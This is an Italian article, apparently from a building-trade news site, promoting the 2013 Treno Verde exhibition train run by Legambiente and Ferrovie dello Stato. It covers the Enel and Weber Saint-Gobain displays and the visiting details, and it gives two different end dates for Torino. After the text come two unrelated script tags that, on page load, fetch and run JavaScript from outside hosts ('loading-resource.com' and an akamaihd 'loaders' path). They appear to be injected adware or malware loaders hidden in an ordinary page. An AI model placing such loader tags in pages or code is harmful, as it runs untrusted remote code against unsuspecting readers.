L’iniziativa serve per sensibilizzare i cittadini alla sostenibilità e monitorare e promuovere le migliori pratiche già in atto in numerose città italiane. In partenza da Roma, il Treno Verde farà tappa a Bari, Reggio Calabria, Salerno, Firenze, Bologna e Milano, concludendo il suo itinerario il 10 aprile a Torino.
Le fonti rinnovabili
Nella seconda carrozza dedicata all’”Abitare smart” , progettata come macro area dedicata alla produzione di energia “green”, è esposta “Libellula”, l’innovativa pala minieolica, progettata da Renzo Piano e sviluppata in collaborazione con Enel Green Power, la società di Enel dedicata alle rinnovabili.
Sottile e quasi trasparente come una libellula, bipala e dunque meno visibile delle tradizionali tripale, sarà difficile da scorgere nel paesaggio e contemporaneamente sarà in grado di funzionare quasi in ogni condizione meteo: basteranno anche 2 metri/sec di vento, una brezza leggera, per attivare la sua capacità di generazione continuata, con una potenza di 55 kw. Mentre nei casi di assenza totale di vento si mimetizzerà ancora di più con l’ambiente circostante riducendosi a una sottile linea verticale data dalla torre, alta 20 metri e con un diametro di appena 35 cm, e dalle due pale verticali, in policarbonato, il cui diametro non supera i 16 metri, allineate e a bandiera. Il prototipo è in test nel campo prova di Molinetto di Pisa, dove ha sede anche il centro ricerche di Enel, prima di dare il via alla produzione in serie.
Nella carrozza sono inoltre illustrate sia le principali tecnologie con cui EGP produce energia da fonte rinnovabile, sia un esempio dei progetti innovativi in fase di sviluppo. In particolare viene mostrato un pilota sulla produzione di elettricità da energia marina.
Enel Drive al servizio della mobilità elettrica
Nella prima carrozza del Treno Verde, denominata “Muoversi smart”, saranno esposti i sistemi elaborati da Enel Distribuzione per la ricarica dei veicoli elettrici. Per soddisfare le diverse esigenze e stili di vita dei clienti, Enel ha realizzato un avanzato sistema di ricarica, semplice e sicuro, caratterizzato da diversi tipi di stazioni di ricarica, già installati ed in esercizio in Italia: box station, potenza 3 kW, da utilizzare in garage privati, e pole station, potenza fino a 22kW, da installare in strade, parcheggi, cortili.
Gli ultimi 12 mesi sono stati dedicati allo sviluppo- in collaborazione con Renault - di Enel Fast Recharge, la nuova stazione di ricarica veloce in corrente alternata a 43kW trifase, che consentirà di ridurre sensibilmente i tempi di ricarica dei veicoli. Le nuove stazioni di ricarica veloci Enel saranno principalmente installate lungo superstrade e autostrade, presso i luoghi sosta e le stazioni di servizio per offrire un servizio di ricarica in 15-30 minuti. Permetteranno, dunque, di raddoppiare, triplicare, quadruplicare l’autonomia attuale dei veicoli elettrici (dai 120 km ai 180), ampliando notevolmente il loro raggio di percorrenza. L’auto elettrica supera, così il ruolo di auto da città o di “seconda macchina”.
Muoversi a impatto zero a bordo di veicoli silenziosi senza alcun tipo di emissioni inquinanti è possibile grazie anche alla gamma di offerte di Enel Energia con la fornitura di energia al 100% da fonti rinnovabili. A seguito del lancio sul mercato dei veicoli elettrici di tutte le principali case automobilistiche mondiali, la Società di Enel per la vendita di elettricità e gas sul mercato libero a famiglie e imprese, ha sviluppato offerte in grado di soddisfare le varie esigenze di ricarica. Si parte da Enel Drive Tutto Compreso, l’offerta per la ricarica a un prezzo fisso indipendente dai prelievi effettuati, comprensivo del costo di fornitura dell’energia, del canone di noleggio della “Home Station” e in più della ricarica presso le colonnine pubbliche installate nella città in cui si trova la Home Station. Enel Drive Tutto Compreso “ricarica pubblica” consente invece la ricarica presso le colonnine pubbliche sempre ad un prezzo fisso indipendente dai prelievi effettuati. In più, da oggi i clienti hanno la possibilità di pagare in base ai consumi effettuati, e quindi all’utilizzo della loro auto, grazie alle nuove offerte Free. Tutte le offerte di Enel Energia per la ricarica dei veicoli elettrici prevedono la fornitura di energia al 100% da fonti rinnovabili, per una mobilità a emissioni zero.
Archilede High Performance, il lampione intelligente
All’interno dei vagoni del Treno Verde sarà possibile conoscere i sistemi di illuminazione pubblica studiati da Enel Sole, prima azienda in Europa nello sviluppo e gestione di impianti di illuminazione pubblica e nella valorizzazione dei beni artistici.
A bordo i passeggeri potranno conoscere Archilede High Performance, il nuovo sistema a LED di Enel Sole, interamente telegestito e telecontrollato, che permette di ridurre fino all’80% i consumi di energia e le emissioni di CO2 e di regolare la luminosità in base alle necessità legate alle condizioni climatiche, del territorio, di visibilità e di traffico. Inoltre, tramite una telecamera istallata sull’apparecchio di illuminazione, sarà possibile videosorvegliare lo spazio urbano e rendere più sicura la vita dei cittadini.
L’elevata qualità della luce garantisce una eccellente resa cromatica, l’uniformità e l’assenza di dispersione verso l’alto del flusso luminoso. A queste caratteristiche si aggiungono la durata di 100 mila ore di vita, l’affidabilità e manutenibilità elevate combinate con costi di installazione contenuti. Archilede rappresenta infine uno strumento estremamente flessibile poiché il sistema di telecontrollo consente l’utilizzo di una serie di servizi integrati a valore aggiunto che evolvono il concetto di illuminazione verso le “Smart Street Lighting”, sistemi di comunicazione Wi-Fi e controllo di monitor informativi a messaggio variabile.
Weber Saint-Gobain
Un vagone del convoglio speciale ospiterà per il mese di viaggio le più innovative soluzioni Weber per il risparmio energetico e l’isolamento termoacustico in edilizia
Sarà un vagone molto speciale, “verde” proprio come il treno che lo ospita. Uno spazio inusuale e tanto più suggestivo che per un mese proporrà ai suoi visitori un approccio innovativo al risparmio energetico in edilizia, mettendo in scena le soluzioni di Weber Saint-Gobain più efficaci per l’isolamento termoacustico e le coperture.
Weber Saint-Gobain nel 2013 sarà infatti al fianco di Legambiente e Ferrovie dello Stato Italiane per la nuova edizione del Treno Verde, in partenza l’8 marzo e che terminerà la sua corsa “amica dell’ambiente” il 12 aprile a Torino Porta Nuova.
La collaborazione tra Weber Saint-Gobain e Legambiente nasce con l'obiettivo di promuovere e valorizzare le tecnologie innovative per l'isolamento termoacustico. Il Gruppo Saint-Gobain, leader mondiale nelle soluzioni per l’Habitat, da anni è impegnato nella ricerca e nello sviluppo di prodotti e materiali all’avanguardia per il comfort abitativo, caratterizzati da elevati standard di eco-sostenibilità, risparmio energetico e rispetto dell’ambiente. Un edificio ben isolato infatti consente di ridurre i consumi energetici necessari per il riscaldamento invernale ed il condizionamento estivo. Consumare meno energia significa a sua volta immettere nell’atmosfera un minor quantitativo di sostanze inquinanti e dunque contribuire a salvaguardare la vita dell’intero ecosistema.
Weber Saint-Gobain salirà così quest’anno sul Treno Verde 2013 di Legambiente e Ferrovie dello Stato Italiane per promuovere l’efficientamento energetico degli edifici con prodotti altamente performanti e rispettosi dell’ambiente, per finanziare l'attività di monitoraggio scientifico dell’inquinamento atmosferico ed acustico nelle città e per informare su specifici temi ambientali in accordo con Legambiente.
Ci sarà spazio infine anche per tre convegni Weber aperti agli operatori del settore sugli stessi temi raccontati dall’sposizione all’interno del vagone, il 19 marzo a Salerno Centrale, il 26 marzo a Firenze Campo di Marte e l’11 aprile a Torino Porta Nuova.
Il Treno Verde
L'obiettivo del 25° viaggio del Treno Verde di Legambiente e Ferrovie dello Stato Italiane è accrescere la cultura ambientale, combattere l'inquinamentoe i mutamenti climatici, ripensare il modo di spostarsi, costruire, vivere, per un futuro migliore. È diventata negli anni una consolidata campagna di monitoraggio scientifico che mette sotto la lente d'ingrandimento il livello d'inquinamento acustico ed atmosferico nelle città. Il Treno, oltre a rilevare lo stato di salute dei centri urbani visitati, è una mostra speciale che conduce i vistatori, carrozza dopo carrozza, alla scoperta della mobilità e del costruire sostenibili, dell'energia pulita, degli stili di vita virtuosi, dell'importanza del verde urbano, all'insegna della tutela dell'ambiente e della qualità della vita. Una vera e propria smart city su rotaie pensata per grandi e piccini, e l'esempio concreto che vivere meglio tutti si può.
L'ingresso alla mostra del Treno Verde è gratuito. La mostra è aperta tutti i giorni tranne la domenica dalle 8,30 alle 14,00 solo per le scuole prenotate. Dalle 16,00 alle 19,00 per tutti i cittadini. Per le classi che vogliono prenotare una visita e per qualsiasi altra informazione: trenoverde@, tel. 06.86268417 – 418 – 419. legambiente.it
<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>